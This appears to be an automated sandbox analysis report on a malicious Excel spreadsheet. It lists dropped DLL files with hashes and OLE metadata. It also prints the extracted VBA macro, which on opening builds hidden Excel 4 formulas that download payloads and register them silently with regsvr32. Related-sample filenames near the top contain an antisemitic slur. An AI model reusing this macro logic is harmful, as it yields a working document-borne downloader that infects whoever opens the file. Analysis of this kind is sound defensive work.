      fuckjewishpeople.mipsGet hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.arm7Get hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.x86Get hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.arm5Get hashmaliciousBrowse
      • 51.222.234.64

      JA3 Fingerprints

      No context

      Dropped Files

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      C:\Users\user\Fiosa.derClaim-1763045001-09242021.xlsGet hashmaliciousBrowse
        Claim-680517779-09242021.xlsGet hashmaliciousBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[3].datClaim-680517779-09242021.xlsGet hashmaliciousBrowse
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[2].datClaim-680517779-09242021.xlsGet hashmaliciousBrowse
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[1].datClaim-680517779-09242021.xlsGet hashmaliciousBrowse

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[1].dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):495616
                Entropy (8bit):6.443782963420258
                Encrypted:false
                SSDEEP:6144:+bqzVbbUYjG8AClk8+O05KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyuns:sqxgYjG8ACv+9KhpsJZRXH52LMcg5n
                MD5:BC74BF4AB8188396FD2874D71A5C4796
                SHA1:F06D95A72071DA2A229FACC45D7FD85DC8E877AB
                SHA-256:09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
                SHA-512:A01F275FDF125154FDCD2B45CE43561EF1D2503D714E45A49348640936909DF7E2655086EF73E1C4C9C2E514FB7AE1004D3DEC193CC6AE264673148A8225B31F
                Malicious:true
                Joe Sandbox View:
                • Filename: Claim-680517779-09242021.xls, Detection: malicious, Browse
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[2].dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):495616
                Entropy (8bit):6.443782963420258
                Encrypted:false
                SSDEEP:6144:+bqzVbbUYjG8AClk8+O05KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyuns:sqxgYjG8ACv+9KhpsJZRXH52LMcg5n
                MD5:BC74BF4AB8188396FD2874D71A5C4796
                SHA1:F06D95A72071DA2A229FACC45D7FD85DC8E877AB
                SHA-256:09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
                SHA-512:A01F275FDF125154FDCD2B45CE43561EF1D2503D714E45A49348640936909DF7E2655086EF73E1C4C9C2E514FB7AE1004D3DEC193CC6AE264673148A8225B31F
                Malicious:true
                Joe Sandbox View:
                • Filename: Claim-680517779-09242021.xls, Detection: malicious, Browse
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[3].dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):495616
                Entropy (8bit):6.443782963420258
                Encrypted:false
                SSDEEP:6144:+bqzVbbUYjG8AClk8+O05KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyuns:sqxgYjG8ACv+9KhpsJZRXH52LMcg5n
                MD5:BC74BF4AB8188396FD2874D71A5C4796
                SHA1:F06D95A72071DA2A229FACC45D7FD85DC8E877AB
                SHA-256:09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
                SHA-512:A01F275FDF125154FDCD2B45CE43561EF1D2503D714E45A49348640936909DF7E2655086EF73E1C4C9C2E514FB7AE1004D3DEC193CC6AE264673148A8225B31F
                Malicious:true
                Joe Sandbox View:
                • Filename: Claim-680517779-09242021.xls, Detection: malicious, Browse
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):162688
                Entropy (8bit):4.254514811147695
                Encrypted:false
                SSDEEP:1536:C6zL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:C+JNSc83tKBAvQVCgOtmXmLpLm4l
                MD5:3B8DE4C0D6EBDF711F55D5ED9F1A9AD4
                SHA1:EED893D0E2929281871906E834EADDA4F0A26884
                SHA-256:97404BEB6D871F1BA61B1AE14284528768B4268C885E559E6DF2D32EECEBBF41
                SHA-512:7D68EC7F5036FF565B5C8B7F1E617740583C7143846AABB3ED9D53139BE639A3EB2E64A24F94C54497774766CB8A4378038C86F8E9ADC786085DDAA35F6610F7
                Malicious:false
                Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
                C:\Users\user\Fiosa.der
                Process:C:\Windows\SysWOW64\explorer.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):495616
                Entropy (8bit):1.3741485480829125
                Encrypted:false
                SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
                MD5:15C440CEBA523F1FA008FAA03D09AC99
                SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
                SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
                SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
                Malicious:true
                Joe Sandbox View:
                • Filename: Claim-1763045001-09242021.xls, Detection: malicious, Browse
                • Filename: Claim-680517779-09242021.xls, Detection: malicious, Browse
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\Fiosa1.der
                Process:C:\Windows\SysWOW64\explorer.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):495616
                Entropy (8bit):1.3741485480829125
                Encrypted:false
                SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
                MD5:15C440CEBA523F1FA008FAA03D09AC99
                SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
                SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
                SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
                Malicious:true
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\Fiosa2.der
                Process:C:\Windows\SysWOW64\explorer.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):495616
                Entropy (8bit):1.3741485480829125
                Encrypted:false
                SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
                MD5:15C440CEBA523F1FA008FAA03D09AC99
                SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
                SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
                SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
                Malicious:true
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Fri Sep 24 10:05:02 2021, Security: 0
                Entropy (8bit):7.828790165256729
                TrID:
                • Microsoft Excel sheet (30009/1) 47.99%
                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                File name:Claim-1368769328-09242021.xls
                File size:419328
                MD5:20b670d4bfd3e5480e7c27cba0c3e11e
                SHA1:167b4de3034917861c38fa6812bd43d5a4ad6a18
                SHA256:e2de3e8aee223f11eddfbb081fa78779b71ba5cb1d3ef657e9b8b3f16406b09a
                SHA512:230714c59a8b5d5656f3c8f93c3fbc04ed8235f28b8887a324145dc4c5a6158d5c1da9b3e907226d029265ee6ad57d616ab8291c0c6414ea603d30c0c4b20b5a
                SSDEEP:6144:Fk3hOdsylKlgxopeiBNhZF+E+W2kdAKTwapS+PS82DPz6ST4+e3G0Sb8duSgcVwh:e5Z8etSwuSgcfPwJjxwrcNDTfsXo/xb
                File Content Preview:........................>.......................................................b.......d.......f..............................................................................................................................................................

                File Icon

                Icon Hash:e4eea286a4b4bcb4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "Claim-1368769328-09242021.xls"

                Indicators

                Has Summary Info:True
                Application Name:Microsoft Excel
                Encrypted Document:False
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Summary

                Code Page:1251
                Author:Test
                Last Saved By:Test
                Create Time:2015-06-05 18:17:20
                Last Saved Time:2021-09-24 09:05:02
                Creating Application:Microsoft Excel
                Security:0

                Document Summary

                Document Code Page:1251
                Thumbnail Scaling Desired:False
                Company:
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:1048576

                Streams with VBA

                VBA File Name: UserForm1, Stream Size: -1
                General
                Stream Path:_VBA_PROJECT_CUR/UserForm1
                VBA File Name:UserForm1
                Stream Size:-1
                Data ASCII:
                Data Raw:
                VBA Code
                Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{6E2E223A-A629-4255-BA17-B75486DE444A}{A668B021-7649-4DE4-8D02-89E3EA2CFA2A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                VBA File Name: Module1, Stream Size: 4112
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                VBA File Name:Module1
                Stream Size:4112
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 03 f0 00 00 00 a2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff d0 03 00 00 30 0d 00 00 00 00 00 00 01 00 00 00 41 a1 0d 0c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "Module1"

Sub auto_open()
On Error Resume Next
Drezden = "="
Naret = "EXEC"
Application.ScreenUpdating = False
Gert
Sheets("Sheet5").Visible = False
Sheets("Sheet5").Range("A1:M100").Font.Color = vbWhite

Sheets("Sheet5").Range("H24") = UserForm1.Label1.Caption
Sheets("Sheet5").Range("H25") = UserForm1.Label3.Caption
Sheets("Sheet5").Range("H26") = UserForm1.Label4.Caption

Sheets("Sheet5").Range("K17") = "=NOW()"
Sheets("Sheet5").Range("K18") = ".dat"
Sheets("Sheet5").Range("K18") = ".dat"


Sheets("Sheet5").Range("H35") = "=HALT()"
Sheets("Sheet5").Range("I9") = UserForm1.Label2.Caption
Sheets("Sheet5").Range("I10") = UserForm1.Caption
Sheets("Sheet5").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Sheet5").Range("I12") = "Byukilos"
Sheets("Sheet5").Range("G10") = "..\Fiosa.der"
Sheets("Sheet5").Range("G11") = "..\Fiosa1.der"
Sheets("Sheet5").Range("G12") = "..\Fiosa2.der"
Sheets("Sheet5").Range("I17") = "regsvr32 -silent ..\Fiosa.der"
Sheets("Sheet5").Range("I18") = "regsvr32 -silent ..\Fiosa1.der"
Sheets("Sheet5").Range("I19") = "regsvr32 -silent ..\Fiosa2.der"
Sheets("Sheet5").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet5").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet5").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet5").Range("H9") = Drezden & "REGISTER(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet5").Range("H17") = Drezden & Naret & "(I17)"
Sheets("Sheet5").Range("H18") = Drezden & Naret & "(I18)"
Sheets("Sheet5").Range("H19") = Drezden & Naret & "(I19)"


Application.Run Sheets("Sheet5").Range("H1")

End Sub

Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
   Application.DisplayAlerts = False
   Sheets("Sheet5").Delete
   Application.DisplayAlerts = True
End Sub

Function Gert()
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheet5"
End Function
                VBA File Name: Sheet1, Stream Size: 991
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                VBA File Name:Sheet1
                Stream Size:991
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . A . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 41 a1 f7 99 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
                VBA File Name: ThisWorkbook, Stream Size: 2774
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                VBA File Name:ThisWorkbook
                Stream Size:2774
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . A . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 a2 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff aa 04 00 00 5e 08 00 00 00 00 00 00 01 00 00 00 41 a1 88 0a 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean

Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
End Sub

Private Sub asWorkbook_Activateas()
    On Error Resume Next

    If m_isOpenDelayed Then
        m_isOpenDelayed = False
        InitWorkbook
    End If
End Sub

Private Sub saWorkbook_Opensa()
    On Error Resume Next

    m_openAlreadyRan = True
    Dim objProtectedViewWindow As ProtectedViewWindow
    '
    On Error GoTo 0
    '
    m_isOpenDelayed = Not (objProtectedViewWindow Is Nothing)
    If Not m_isOpenDelayed Then InitWorkbook
End Sub

Private Sub ssaaInitWorkbookssaa()
    On Error Resume Next

    If VBA.Val(Application.Version) < 12 Then
        Me.Close False
        Exit Sub
    End If
    '
        'Other code
        '
        '
        '
End Sub
                VBA File Name: UserForm1, Stream Size: 1180
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/UserForm1
                VBA File Name:UserForm1
                Stream Size:1180
                Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . A . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 41 a1 c5 51 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{6E2E223A-A629-4255-BA17-B75486DE444A}{A668B021-7649-4DE4-8D02-89E3EA2CFA2A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

                Streams

                Stream Path: \x1CompObj, File Type: data, Stream Size: 108
                General
                Stream Path:\x1CompObj
                File Type:data
                Stream Size:108
                Entropy:4.18849998853
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                General
                Stream Path:\x5DocumentSummaryInformation
                File Type:data
                Stream Size:244
                Entropy:2.65175227267
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
                General
                Stream Path:\x5SummaryInformation
                File Type:data
                Stream Size:208
                Entropy:3.30164724619
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . 3 . B # . . . . . . . . . . .
                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 391141
                General
                Stream Path:Workbook
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:391141
                Entropy:7.94597570807
                Base64 Encoded:True
                Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . d . % 8 . . . . . . . X . @
                Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 661
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECT
                File Type:ASCII text, with CRLF line terminators
                Stream Size:661
                Entropy:5.27224586563
                Base64 Encoded:True
                Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
                Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 50 61 63 6b 61
                Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                File Type:data
                Stream Size:116
                Entropy:3.35524796933
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 00 00
